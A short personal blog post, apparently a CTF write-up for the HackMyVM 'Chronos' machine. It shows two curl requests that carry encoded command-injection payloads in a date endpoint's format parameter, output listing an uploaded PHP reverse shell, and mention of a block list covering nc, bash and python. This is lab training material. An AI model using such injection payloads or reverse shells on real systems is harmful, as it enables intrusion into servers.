Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Chronos

The author's writeup is here:https://al1enum.github.io/docs/Chronos.pdf.


Very interesting machine.


The author use perl to get reverse shell, because the machine blocked many keywords: nc, bash, python, etc.

My way is to use wget to download a php reverse shell.

 ~ curl 'http://chronos.local:8000/date?format=261Bh6biKcNSb82qsJG3axmPWvBhPVZUTUzqYLXr2nGfYVHfcpNVUhTU1Z95B5dJzYt151Eki' -A 'Chronos'  
 Something went wrong
 
 ~ curl 'http://chronos.local:8000/date?format=H8SMnBduptVPuh8JQtH81okZXHxz74' -A 'Chronos'
 Sun Aug  8 04:05:06 UTC 2021
 total 24
 drwxr-xr-x 3 www-data www-data 4096 Aug  8 04:03 .
 drwxr-xr-x 3 root     root     4096 Jul 29 08:59 ..
 drwxr-xr-x 2 www-data www-data 4096 Jul 30 08:00 css
 -rw-r--r-- 1 www-data www-data 1887 Aug  4 07:18 index.html
 -rw-r--r-- 1 www-data www-data 5496 Aug  8 04:03 r.php




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1